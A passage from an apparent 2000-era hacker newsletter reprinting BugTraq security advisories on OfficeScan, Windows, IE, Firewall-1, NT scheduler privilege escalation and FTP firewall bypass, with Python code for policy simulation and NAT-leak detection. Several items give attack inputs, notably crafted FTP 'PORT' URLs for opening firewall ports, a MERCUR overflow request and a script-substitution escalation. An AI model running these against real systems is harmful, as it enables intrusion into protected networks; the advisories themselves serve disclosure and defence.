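    return policy(site, new, store, trusted_signers, date(2000, 3, 17))


if __name__ == "__main__":
    for name, policy in (("Netscape 4.x", netscape4_decision), ("proposed", proposed_decision)):
        d = run_advisory_scenario(policy)
        print(f"{name:12s}: {d.action:6s} - {d.reason}")
```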
@HWA

101.0 HNS:"OfficeScan DoS & Message Replay" Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 17, 2000

Trend Micro has released a new version of OfficeScan Corporate Edition - version 3.51 - that eliminates two security vulnerabilities found on previous versions ...

"OfficeScan DoS & Message Replay" Vulnerability
Posted to BugTraq on March 17, 2000

Summary
=======

Trend Micro has released a new version of OfficeScan Corporate Edition - version 3.51 - that eliminates two security vulnerabilities found on previous versions. Previous versions of OfficeScan allow intruders within a firewall to initiate a DoS attack on the OfficeScan client (tmlisten.exe) as well as to capture OfficeScan commands. These commands can be replayed and used to change other OfficeScan client configurations.

Issues
======

Trend OfficeScan version 3.5 or earlier versions perform incomplete parsing and buffer overflow checking in its Windows NT client. If a malicious user has the ability to telnet and submit some form of message to the OfficeScan NT client, OfficeScan service consumes 100% CPU processing power. In addition, communication between the OfficeScan server and client was established with insufficient encryption and authentication, which allows a malicious user to sniff and replay OfficeScan commands.

Implementation
==============

Trend Micro has corrected the DoS attack issue by correctly parsing and handling commands or arbitrary messages sent to the OfficeScan client. Trend Micro has implemented MD5 Message-Digest Algorithm to ensure that the commands between the server and the clients can not be decrypted or captured to be replayed to other clients.
For details about the MD5 encryption algorithm see: http://theory.lcs.mit.edu/~rivest/rfc1321.txt

Affected Software Versions
==========================

Trend OfficeScan Corporate Edition 3.0
Trend OfficeScan Corporate Edition 3.11
Trend OfficeScan Corporate Edition 3.13
Trend OfficeScan Corporate Edition 3.5
Trend OfficeScan for Microsoft SBS 4.5

Patch Availability
==================

- http://www.antivirus.com/download/ofce_patch.htm

More Information
================

Please see the following references for more information related to this issue.

- Trend Micro Security Bulletin: http://www.antivirus.com/download/ofce_patch_35.htm
- Frequently Asked Questions: Trend Micro Knowledge Base http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8

Obtaining Support on this Issue
===============================

This is a fully supported release. Information on contacting Trend Micro Technical Support is available at http://www.trend.com/support/default.htm

@HWA

102.0 HNS:MS Security bulletin#17
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 17, 2000

Microsoft has released a patch that eliminates a security vulnerability in Microsoft(r) Windows(r) 95, Windows 98, and Windows 98 Second Edition. The vulnerability could cause a user's system to crash, if they attempted to access a file or folder whose path contained certain reserved words. ...

MS Security bulletin#17
Posted to BugTraq on March 17, 2000

Microsoft Security Bulletin (MS00-017)
--------------------------------------

Patch Available for "DOS Device in Path Name" Vulnerability

Originally Posted: March 16, 2000

Summary
=======

Microsoft has released a patch that eliminates a security vulnerability in Microsoft(r) Windows(r) 95, Windows 98, and Windows 98 Second Edition. The vulnerability could cause a user's system to crash, if they attempted to access a file or folder whose path contained certain reserved words.
Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/technet/security/bulletin/fq00-017.asp.

Issue
=====

DOS device names are reserved words, and cannot be used as folder or file names. When parsing a reference to a file or folder, Windows correctly checks for the case in which a single DOS device name is used in the path, and treats it as invalid. However, it does not check for the case in which the path includes multiple DOS device names. When Windows attempts to interpret the device name as a file resource, it performs an illegal resource access that usually results in a crash.

Because it is not possible to create files or folders that contain DOS device names, it would be unusual for a user to try to access one under normal circumstances. The chief threat posed by this vulnerability is that a malicious user could attempt to entice a user to attempt such an access. For instance, if a web site operator hosted a hyperlink that referenced such a path, clicking the link would result in the user's machine crashing. Likewise, a web page or HTML mail that specified a local file as the source of rendering information could cause the user's machine to crash when it was displayed. If this happened, the machine could be put back into normal service by restarting it.

Affected Software Versions
==========================

- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98 Second Edition

Patch Availability
==================

- Windows 95: http://www.microsoft.com/downloads/release.asp?releaseID=19491
- Windows 98 and Windows 98 Second Edition: http://www.microsoft.com/downloads/release.asp?ReleaseID=19389

NOTE: Additional security patches are available at the Microsoft Download Center

NOTE: The patch will be available shortly at the WindowsUpdate site. When this happens, we will modify the bulletin to provide additional information.
More Information
================

Please see the following references for more information related to this issue.

- Microsoft Security Bulletin MS00-017: Frequently Asked Questions, http://www.microsoft.com/technet/security/bulletin/fq00-017.asp
- Microsoft Knowledge Base article Q256015 discusses this issue and will be available soon.
- Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp.

Obtaining Support on this Issue
===============================

This is a fully supported patch. Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp

Revisions
=========

- March 16, 2000: Bulletin Created.

@HWA

103.0 HNS:Georgi Guninski security advisory #9
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 15, 2000

There is a vulnerability in IE and Outlook 5.x for Win9x/WinNT (probably others) which allows executing arbitrary programs using .eml files. This may be exploited when browsing web pages or opening an email message in Outlook. ...

Georgi Guninski security advisory #9
Posted to BugTraq on March 15, 2000

IE and Outlook 5.x allow executing arbitrary programs using .eml files

Disclaimer:

The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof.

Description:

There is a vulnerability in IE and Outlook 5.x for Win9x/WinNT (probably others) which allows executing arbitrary programs using .eml files. This may be exploited when browsing web pages or opening an email message in Outlook. This may lead to taking control over user's computer. It is also possible to read and send local files.
Details:

The problem is creating files in the TEMP directory with known name and arbitrary content. One may place a .chm file in the TEMP directory which contains the "shortcut" command and when the .chm file is opened with the showHelp() method programs may be executed.

This vulnerability may be exploited by HTML email message in Outlook.

Demonstration which starts Wordpad:
http://www.nat.bg/~joro/eml.html

(Note: George seems to have pulled the script, it gives a 404 now .. - Ed/Cruci)

Workaround: Disable Active Scripting.

Copyright 2000 Georgi Guninski

103.1 PSS:More MSIE crashing info by NtWakO
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: Packet Storm Security
http://packetstorm.securify.com/

--[Tuesday, March 21, 2000 by NtWaK0 / biteraser]------------------------------
--[Crash ALL IE 4 / IE 5 on Windows 9x and All NT SPx with *HISTORY* Object]---
--[Tested on Win 9x IE4 IE 5 NT 4.0 SPx +IE 4 IE 5, I guess IE 3 too ?]-------

Here is the story, while having a chat (IRC) with biteraser today heh, he suddenly said *fu*k* hrm... I said what is wrong He said I JUST CRASHED IE.. After some investigation it turned out to be the *HISTORY* Object :). So if you cut and paste the html code in a file, then open it with IE, you will be able to see the crash.

Note: key line is: , without it IE won't crash and behavior should be #default. It can be exploited more.

--[SNIP]--------------------------------------------------------------------
--- Crash ALL IE 4 ALL IE 5 on Windows 9x and All NT SPx
--[SNIP]--------------------------------------------------------------------
---
NOTE: Crash Memory dump.
Application exception occurred:
App: exe\iexplore.dbg (pid=219)
When: 3/21/2000 @ 12:52:24.60
Exception number: c0000005 (access violation)

State Dump for Thread Id 0xd2

eax=017d1e10 ebx=00000000 ecx=70f01c28 edx=70f01ef4 esi=00000000 edi=80004005
eip=70bd1816 esp=00069688 ebp=000696a4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202

function: Ordinal158
70bd180d 8b542408 mov edx,[esp+0x8] ss:0129808f=????????
70bd1811 56 push esi
70bd1812 8b742408 mov esi,[esp+0x8] ss:0129808f=????????
FAULT ->70bd1816 0fb706 movzx eax,word ptr [esi] ds:00000000=????
70bd1819 46 inc esi
70bd181a 46 inc esi
70bd181b 83f841 cmp eax,0x41
70bd181e 7c05 jl Ordinal158+0x18 (70bd1825)
70bd1820 83f85a cmp eax,0x5a
70bd1823 7e1d jle Ordinal158+0x35 (70bd1842)
70bd1825 0fb70a movzx ecx,word ptr [edx] ds:70f01ef4=0043
70bd1828 42 inc edx
70bd1829 42 inc edx
70bd182a 83f941 cmp ecx,0x41
70bd182d 7c05 jl Ordinal158+0x27 (70bd1834)

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name
000696a4 700c8078 017d1e10 00000000 0009e4cc 012c5938 SHLWAPI!Ordinal158
000696cc 700c8014 017d1e10 00000000 012c5a34 012c5938 MSHTML!ShowModalDialog
000696f4 700c7f8e 00000000 012c5a34 012c5938 00069740 MSHTML!ShowModalDialog
00069718 700c7f05 00000000 012c5938 00069740 012c5930 MSHTML!ShowModalDialog
00069744 700c7e5d 00000000 012c59ec 0000c07c 0009c07c MSHTML!ShowModalDialog
00069b60 700c7b2f 012c5930 00000000 012c5904 012c5930 MSHTML!ShowModalDialog
00069b94 700add5d 012c5930 012c5904 00001000 012c3410 MSHTML!ShowModalDialog
0006dc58 700774db 012c3410 0006dc78 0009c070 0009bb60 MSHTML!DllGetClassObject
0006dc8c 7004723f 00000003 0006dccc 012c2600 0006dcd8 MSHTML!MatchExactGetIDsOfNames
00000000 00000000 00000000 00000000 00000000 00000000 MSHTML!MatchExactGetIDsOfNames
016fffdc ff ff ff ff 44 b9 f3 77 - 38 d2 f3 77 00 00 00 00 ....D..w8..w.... 016fffec 00 00 00 00 00 00 00 00 - be ca 0d 70 10 24 2c 01 ...........p.$,. 016ffffc 00 00 00 00 4d 5a 90 00 - 03 00 00 00 04 00 00 00 ....MZ.......... 0170000c ff ff 00 00 b8 00 00 00 - 00 00 00 00 40 00 00 00 ............@... 0170001c 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 0170002c 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 0170003c c0 00 00 00 0e 1f ba 0e - 00 b4 09 cd 21 b8 01 4c ............!..L 0170004c cd 21 54 68 69 73 20 70 - 72 6f 67 72 61 6d 20 63 .!This program c 0170005c 61 6e 6e 6f 74 20 62 65 - 20 72 75 6e 20 69 6e 20 annot be run in 0170006c 44 4f 53 20 6d 6f 64 65 - 2e 0d 0d 0a 24 00 00 00 DOS mode....$... 0170007c 00 00 00 00 63 c9 86 b7 - 27 a8 e8 e4 27 a8 e8 e4 ....c...'...'... 0170008c 27 a8 e8 e4 27 a8 e9 e4 - cb a8 e8 e4 7e 8b fb e4 '...'.......~... --[END]--------------------------------------------------------------------- --- Cheers, |-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-| The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and i'm not even too sure about that one"--Dennis Huges, FBI. |-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-| Live Well Do Good --:) Cheers, ------|oOo-(NtWaK0)(Telco. Eng. InfoSec Senior, Etc..)-oOo|------ The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and i'm not even too sure about that one"--Dennis Huges, FBI. ----------------------------------------------------------------- Live Well Do Good --:) @HWA 104.0 HNS:Drive Mappings in Interactive Login ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 15, 2000 Issue: Drive Mappings in Interactive Login affect Processes running in context of Schedule User. 
Points indicating this is a bug/security exploit and not by design (as some
have indicated to the author) ...

Drive Mappings in Interactive Login

Posted to BugTraq on March 15, 2000

Issue: Drive Mappings in Interactive Login affect Processes running in
context of Schedule User.

Points indicating this is a bug/security exploit and not by design (as some
have indicated to me)

1. Drive mappings are individual to each user, as seen by their location in
the registry under HKCU\Network. This point alone indicates a bug. Why
should the *personal* drive mappings of an interactive login session have
*any* effect on a service running in a different user context, in a
supposedly secure environment? They shouldn't, plain and simple.

2. KB Article Q130668 is the only article I could find which has any
relationship to this issue, but it deals with a "bug" when the drives are
mapped to Netware Volumes using GSNW. However, reading between the lines,
one can see that the behavior described (which is identical in both Netware
and NT drive mappings) is not by design, otherwise, why would they state
this:

Microsoft has confirmed this to be a problem in Windows NT Workstation and
Server versions 3.5, 3.51, and 4.0...

They do offer up a solution to one half of the problem - that is when the
scheduled process leaves a mapped drive, which then affects any interactive
processes by preventing the use of this drive (unless appropriate
permissions exist for the interactive user). But they make no mention of
the other half - that a non-privileged user can affect the environment of
the scheduled process, which is often in a privileged account context.

Take the following scenario:

A "secure" NT workstation is configured with scheduler running in a user
context that has specific elevated rights in order to perform unattended
administrative functions based on scripts that are stored on a server. But
one of the tasks performed in these scripts requires a mapped drive letter;
UNC paths won't work. So to be sure, the script begins by mapping a drive
letter to the shared network resource containing the patches and updates
placed there when required. Often these patches are security fixes and the
like, and the scheduler dutifully applies them to some large number of
machines as directed in the script.

Here comes the exploit. If an interactive login is present, and the same
drive letter is already mapped by a user, the net use in the scheduled
script will fail, as will the required hotfix or update. Not a pretty
picture in a large LAN whose security and stability may rely on timely
installation of these updates. This is the simplest "exploit".

Next we extend this a bit further: the user maps a drive letter in an
interactive login, and places in it a script with the same filename as that
called by the scheduled update, and makes sure the schedule user has
permissions to this file and network resource. All of this could be
performed by a non-privileged user. The schedule service will now execute
this script in the elevated user context, and the script could be
instructed to install a trojan, add the user to the local Admin group, or
whatever.

The bottom line is that this design flaw can be easily exploited to allow
any user with interactive login rights to a workstation to elevate himself
to the rights of the schedule user, which is often Administrator of the
workstation.

I have tested this on NT4 SP5 and 6a. (Note this is without IE5 installed,
just the built in AT scheduler). I have also tested this with all
combinations of Local and Domain accounts for both the scheduler and the
interactive user. I have tested it with and without persistent drive
mappings present for either user - in each case, whoever gets the login
first gets the drive letter.
@HWA

105.0 HNS:DoS Attack in MERCUR WebView
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 15, 2000

UssrLabs found a buffer overflow in MERCUR WebView WebMail-Client 1.0 where
they do not use proper bounds checking in the code which handles the GET
commands. The following all result in a Denial of Service against the
service in question. ...

DoS Attack in MERCUR WebView

Posted to BugTraq on March 15, 2000

USSR Advisory Code: USSR-2000036
Release Date: March 16, 2000

Systems Affected: MERCUR WebMail-Client Version 1.0 port (1080)

THE PROBLEM

UssrLabs found a buffer overflow in MERCUR WebView WebMail-Client 1.0 where
they do not use proper bounds checking in the code which handles the GET
commands. The following all result in a Denial of Service against the
service in question.

Example:

http://hostip:1080/mmain.html&mail_user=(buffer)

Where [buffer] is approx. 1000 characters.

(0) Binary or source for this Exploit: http://www.ussrback.com/

Exploit: the Exploit crashes the remote machine's WebMail service.

Vendor Status: informed
Vendor Url: http://www.atrium-software.com
Program Url: http://www.atrium-software.com/mercur/webview_e.html

Credit: USSRLABS

SOLUTION

Nothing yet.

@HWA

106.0 HNS:Problem with Firewall-1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 15, 2000

The Dartmouth College security group has uncovered a problem with
Firewall-1 which could lead to the protected site handing out more IP
address info than intended. ..

Problem with Firewall-1

Posted to BugTraq on March 15, 2000

The Dartmouth College security group has uncovered a problem with
Firewall-1 which could lead to the protected site handing out more IP
address info than intended. Under certain nominal load conditions (CPU
less than 40%, 200+ active sessions) Firewall-1 will begin "leaking"
packets with their private address information intact. The result is that
the receiving site will receive a SYN=1 that it will be unable to respond
to.
Once the client attempts a resend, the target network (or anyone in the
middle) can use the source port information to enumerate the client's true
IP address.

Here is a Snort trace which has been sanitized and formatted for easier
viewing:

Mar 9 14:01:19 172.30.1.10:1721 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:01:48 200.200.200.5:1721 -> 192.168.1.5:80 SYN **S*****

Mar 9 14:04:35 172.30.1.10:1858 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:05:05 200.200.200.5:1858 -> 192.168.1.5:80 SYN **S*****

Mar 9 14:23:25 172.16.5.20:4868 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:23:51 200.200.200.5:4868 -> 192.168.1.5:80 SYN **S*****

So the first packet goes out with the private address information still in
place and SYN=1. When the client does not receive a reply, it retransmits
the SYN=1. Since FW-1 considers this to be part of the same session, the
same source port number is assigned. If the second packet gets translated
properly (as in these traces) the source port info can potentially be used
to map the legal IP address to the private address.

Of course the problem here is that a would-be bad guy now knows the
client's true IP address. If enough hosts are recorded, it's possible that
most of the internal network address space could be enumerated.

This problem has been noted on Firewall-1 versions 3.0b & 4.0. 4.1 has not
been checked but it's expected that the same problem may exist. We were
able to reproduce the problem on a Nokia IP440 and NT. I've seen this
problem on Solaris 2.6 as well, but do not have the data to back up the
statement.

A quick fix is to apply egress filtering to the border router and block
all private addressing that attempts to leak through. A how-to on egress
can be found at: http://www.sans.org/y2k/egress.htm

Cheers all,
Chris

@HWA
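The source-port correlation Chris describes in 106.0 is easy to automate on the defending side, so that the site's own IDS raises the alarm before a remote observer does. What follows is an added example, not code from the post or from any Firewall-1 or Snort tooling: it reads Snort-style one-line SYN alerts, pairs each SYN from an RFC 1918 source with the next SYN from a public source that reuses the same source port toward the same destination inside a short window, and reports the public-to-private mappings that such a leak hands out. The sample lines are the post's sanitized trace; the year (syslog timestamps carry none) and the 120-second pairing window are assumptions.

```python
"""Detect Firewall-1 style NAT leaks in Snort SYN alerts.

Added example, not code from the BugTraq post or from any vendor tool.
Assumed: syslog-style lines without a year (2000 is assumed), and that a
private-source SYN followed within WINDOW by a public-source SYN with the
same source port and destination is the retransmission of the same session.
"""
import ipaddress
import re
from datetime import datetime, timedelta

# Constructed sample input: the sanitized Snort trace quoted in the post.
SAMPLE_TRACE = """\
Mar 9 14:01:19 172.30.1.10:1721 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:01:48 200.200.200.5:1721 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:04:35 172.30.1.10:1858 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:05:05 200.200.200.5:1858 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:23:25 172.16.5.20:4868 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:23:51 200.200.200.5:4868 -> 192.168.1.5:80 SYN **S*****
"""

ASSUMED_YEAR = 2000                 # assumption: syslog lines have no year
WINDOW = timedelta(seconds=120)     # assumption: covers a few SYN retransmits

LINE_RE = re.compile(
    r"^(?P<mon>[A-Za-z]{3})\s+(?P<day>\d{1,2})\s+(?P<time>\d\d:\d\d:\d\d)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s+SYN\b"
)


def parse_syn(line):
    """Return (timestamp, src, sport, dst, dport) for a SYN alert, else None."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    stamp = datetime.strptime(
        f"{m['mon']} {m['day']} {m['time']} {ASSUMED_YEAR}", "%b %d %H:%M:%S %Y"
    )
    return stamp, m["src"], int(m["sport"]), m["dst"], int(m["dport"])


def find_leaks(trace, window=WINDOW):
    """Pair leaked private-source SYNs with their translated retransmissions.

    Returns a list of (public_ip, private_ip, source_port, delay) tuples,
    one per recovered mapping, in the order the retransmissions were seen.
    """
    pending = {}      # (sport, dst, dport) -> (timestamp, private source)
    mappings = []
    for line in trace.splitlines():
        rec = parse_syn(line)
        if rec is None:
            continue                  # not a SYN alert in the expected shape
        stamp, src, sport, dst, dport = rec
        key = (sport, dst, dport)
        if ipaddress.ip_address(src).is_private:
            # Leaked packet: remember it and wait for the translated retry.
            pending[key] = (stamp, src)
            continue
        hit = pending.pop(key, None)
        if hit is not None and timedelta(0) <= stamp - hit[0] <= window:
            mappings.append((src, hit[1], sport, stamp - hit[0]))
    return mappings


def enumerate_internal(mappings):
    """Group recovered private addresses by the public (NAT) address."""
    by_public = {}
    for public, private, _sport, _delay in mappings:
        by_public.setdefault(public, set()).add(private)
    return by_public


if __name__ == "__main__":
    leaks = find_leaks(SAMPLE_TRACE)
    for public, private, sport, delay in leaks:
        print(f"{public} -> {private} (src port {sport}, retry after {delay.seconds}s)")
    print(enumerate_internal(leaks))
```

Run against the post's trace the script reports three mappings, all from the one public address 200.200.200.5 back to two internal hosts. On a real sensor the same logic would sit on the outside interface of the firewall; any private-source SYN seen there is already a finding, and the pairing only shows how much an outsider could learn from it. The pairing key deliberately includes the destination, so unrelated sessions that happen to reuse a source port are not matched.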
107.0 HNS:Freeze Distribution of IE 5.0, 5.0a, and 5.0b
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 15, 2000

Microsoft has just discovered a serious problem when a user attempts to
install the 128-bit security patch for Internet Explorer 5.0, 5.0a and
5.0b on Windows 2000 as part of an IE5.0 IEAK package. After restarting
the system, users will not be able to log on to Windows 2000 ...

Freeze Distribution of IE 5.0, 5.0a, and 5.0b

Posted to BugTraq on March 15, 2000

Microsoft has just discovered a serious problem when a user attempts to
install the 128-bit security patch for Internet Explorer 5.0, 5.0a and
5.0b on Windows 2000 as part of an IE5.0 IEAK package. After restarting
the system, users will not be able to log on to Windows 2000.

The instructions to incorporate the 128-bit security patch into IEAK
packages say you should use the command line switches: "/q:a /r:n /n:v"

The /n:v switch when used with ie5dom.exe (the 128-bit security patch for
5.0x) causes important security files on Windows 2000 to be replaced with
older files, preventing users from logging on.

Installations created using IEAK 5.0 for Windows 95, Windows 98, and
Windows NT4 systems with the ie5dom.exe, and these command line parameters
specified, are not affected.

It is critical that you freeze distribution of IE 5.0, 5.0a or 5.0b builds
that incorporate the 128-bit security patch with these switches. Please
take immediate action to help prevent more customers from encountering
this issue.

Please check http://www.microsoft.com/windows/ieak/en/support/faq/default.asp
and Microsoft Knowledge Base (KB) article Q255669 for updates to this
issue.

Note: It may take 24 hours from the original issuance of this bulletin for
the Microsoft Knowledge Base (KB) article related to this issue to be
visible.

We sincerely apologize for this inconvenience and thank you in advance for
your help in protecting end users.

Thank you,
The IEAK Product Team

Checking to see if you have included this command-line switch:

To check a package for this issue:

Open your IEAK package in the IEAK Wizard and go to the Custom Components
screen. Examine each custom component. If you have included ie5dom.exe as
a custom component, check the command line switches for '/R:N /Q:A /N:V'

*OR*

If you don't have the IEAK Wizard available to you:

1) Extract your custom IE 5.0x package by running this command line:
   'ie5setup.exe /c /t:'

2) Browse to the directory. Open 'iesetup.cif' in Notepad.

3) Look for a section like this:

[CUSTOM0]
SectionType=Component
DisplayName='128-bit Security'
URL1='Ie5dom.exe',2
GUID=128PATCH
Command1='Ie5dom.exe'
Switches1='/R:N /Q:A /N:V'
Type1=2
UninstallKey=''
Version=
Size=216
Platform=win95,win98,nt4,nt5,
Modes='0,1,2'
Details='128-bit Securiy'
Group=CustItems
Priority=500
UIVisible=0

4) Examine for: Switches1='/R:N /Q:A /N:V'

If you have this switch listed, immediately freeze distribution of this
package!!!

@HWA

108.0 HNS:Extending the FTP "ALG" vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 15, 2000

It is possible to cause many firewalls to open arbitrary ports allowing
external hosts to connect to "protected" clients. In this case, it is done
by fooling the protected client into sending a specially crafted FTP
request through the firewall, which it misinterprets as a legitimate FTP
"PORT" command ...

Extending the FTP "ALG" vulnerability

Posted to BugTraq on March 15, 2000

Author: Mikael Olsson, EnterNet Sweden mikael.olsson@enternet.se
Original Date: 2000-03-10
Originally posted to: Bugtraq, Vuln-dev (BID 1045)
Vendor contacted: Nope, sorry, too many.
Updated: 2000-03-14
- Added browser-specific info
- Begun writing a list of firewalls expected to be vulnerable
- Rewrote a couple of paragraphs that were causing much head scratching

Synopsis

It is possible to cause many firewalls to open arbitrary ports allowing
external hosts to connect to "protected" clients. In this case, it is done
by fooling the protected client into sending a specially crafted FTP
request through the firewall, which it misinterprets as a legitimate FTP
"PORT" command.

Basic idea : how to open arbitrary ports against a client

* Send a HTML email to an HTML-enabled mail reader containing the tag

  You could also conceivably plant a web page somewhere on a server
  containing this link. Please reference CERT advisory CA-2000-02:
  Malicious HTML Tags Embedded in Client Web Requests
  http://www.cert.org/advisories/CA-2000-02.html

* Balance the number of A so that the PORT command will begin on a new
  packet boundary. This may also be done by having the server use a low TCP
  MSS to decrease the number of A's that one has to add.

* The firewall in question will incorrectly parse the resulting

  RETR /aaaaaaaa[....]aaaaaPORT 1,2,3,4,0,139

  as first a RETR command and then a PORT command and open port 139 against
  your address (1.2.3.4 in this case)

* Now the server ftp.rooted.com can connect to the client on port 139.
  Ouch.

Before you ask: No, it does not have to be port 139. It can be any port.
Some firewalls disallow "known server ports" for these connections; such
ports cannot be used, but I'm betting there are plenty other ports that can
be used in such cases.

Address translation playing games

You have to know the IP address of the client in order to fool the firewall
into opening the port. If the client is not dynamically NATed, this is
easy. If the client IS dynamically NATed, this is a bit harder.

How to make it work through address translation

There are several ways to figure out what the private address is. Here's
two:

* Send an email to the address in question containing an img src
  ftp://ftp.rooted.com:23456 and hope that the firewall won't realise that
  port 23456 is FTP. PORT commands won't be translated this way, so the
  private IP address will be exposed. This assumes that 23456 is allowed
  through the firewall and that it won't attempt to parse FTP command data
  on that port.

* Send an email with a link to a web page that contains javascript that
  extracts the private IP address and posts it to the server. The
  javascript code below works on Netscape; I don't know what the
  equivalent is for MSIE.

  var tool = java.awt.Toolkit.getDefaultToolkit();
  addr = java.net.InetAddress.getLocalHost();
  ip = addr.getHostAddress();

Once we know about the IP address, we can adjust the img src so that it is
valid for that specific internal client. The dynamic translation will also
likely change the port number opened on the NAT:ed public address, but
that's ok. All we have to do is have our fake FTP server read the command
packet containing the PORT command, as changed by the firewall, and we'll
know what public address and port to connect to in order to get to our
desired port on the "protected" client.

I think I've heard about reverse firewall penetration before

Yeah, the idea of internal users fooling a firewall to let them out isn't
new, but the scope of this vulnerability is "new" IMHO. Basically, you can
get at anyone with a browser or HTML-enabled mail reader protected by
firewalls that have more than 50% market coverage. That's bad.

What about Checkpoint's FTP PASV fix for FW-1?

Checkpoint's fix for FW-1 is to make sure that every packet in the command
stream ends with CRLF (0x0a 0x0d in hex). That would help against the above
attack, but not if we modify it a wee bit:

src="ftp://ftp.rooted.com/aaaaaaa%0a%0dPORT 1,2,3,4,0,139"

Ouch. This WILL work in Netscape v4.7 (I've verified it using a network
sniffer, anyone care for a packet dump?). The firewall will see this as two
separate commands:

RETR aaaaaaaaaa
PORT 1,2,3,4,0,139

which means that poorly implemented proxies are likely to be vulnerable as
well.

This in and of itself is a browser bug IMHO. Line feeds are not valid
characters in a file name.

Added: 2000-03-14
Apparently, this CRLF variant will _not_ work in MSIE (version unknown?).
It's doing the right thing: stripping out the CRLF. (Second hand info, I
have not verified MSIE's behaviour)

No information on other browsers or mail readers.

Other fixes?

I haven't seen other firewall vendors make public claims that they protect
against any of these attacks. Cisco is apparently working on a fix for
PIX, but it's taking time, so I'm guessing they're doing it the right way
- since doing it the right way really does take quite a bit of time.

It would seem like all the others are silently going to sneak fixes into
their upcoming updates and pretend like they never were vulnerable in the
first place. Grumble.

Added: 2000-03-14
I suspect that FW-1's security servers may disable this attack. (Dunno,
I'm not an FW-1 user)

What firewalls are likely to be vulnerable?

This specific attack is likely to work against most "stateful inspection"
firewalls with poorly implemented application layer filters. This probably
includes most products out there. It may also affect poorly implemented
"proxies" when the CRLF is added before the PORT command as described
above.

Added: 2000-03-14

Checkpoint FW-1 v3 is likely to allow connections on most ports 1024-65535
with full bidirectional communication

Checkpoint FW-1 v4 is likely to allow connection on most ports 1024-65535
with only unidirectional communication

Cisco PIX is likely to allow connections to any port with full
bidirectional communication

Linux's ip_masq_ftp module is _really_ easy to fool, according to Solar
Designer. It will accept a "PORT" command anywhere in a packet. This means
that even this is likely to work:

"http://rooted.com:21/PORT 1,2,3,4,0,139"

This is likely NOT a complete list.

And no, I'm not going to get in touch with vendors and report the
vulnerability. There are just too many that are likely to be affected.

"The great picture"

Other protocols than FTP are likely to be affected by this type of
vulnerability - pretty much any protocol that opens up ephemeral ports
after the initial command session. A couple that come to mind are:

* Oracle SQL*Net (versions using separate data channels)
* RealAudio/Video (secondary UDP channel)
* H.323 (NetMeeting et al)

THIS IS NOT A COMPLETE LIST. Those were just a couple of common ones off
the top of my head.

Workarounds to this specific vulnerability

* Disable active FTP. Errrr, wait. The fix for the server side
  vulnerability was to disable passive FTP. Let's rephrase that:

* Disable FTP altogether. Block port 21. Disable FTP Application Layer
  Filters on all ports in your firewall.

* If you can't change the settings in your firewall, set the "FTP Proxy"
  setting in your browser/HTML-enabled mail reader to some address that
  doesn't exist, like 127.0.0.2. After this change, your browser won't be
  able to connect anywhere using FTP. (From Solar Designer: This does not
  help if you're using ip_masq_ftp, since it'll be fooled by HTTP looking
  like FTP.)

@HWA

109.0 FreeBSD-SA-00:08: Lynx overflows
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Submitted by FProphet
Source: Bugtraq

Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Date: Wed, 15 Mar 2000 09:34:43 -0800
Reply-To: security-officer@freebsd.org
Sender: Bugtraq List
Comments: RFC822 error: FROM field duplicated. Last occurrence was retained.
From: FreeBSD Security Officer
Subject: FreeBSD Security Advisory: FreeBSD-SA-00:08.lynx
To: BUGTRAQ@SECURITYFOCUS.COM

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:08                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          Lynx ports contain numerous buffer overflows

Category:       ports
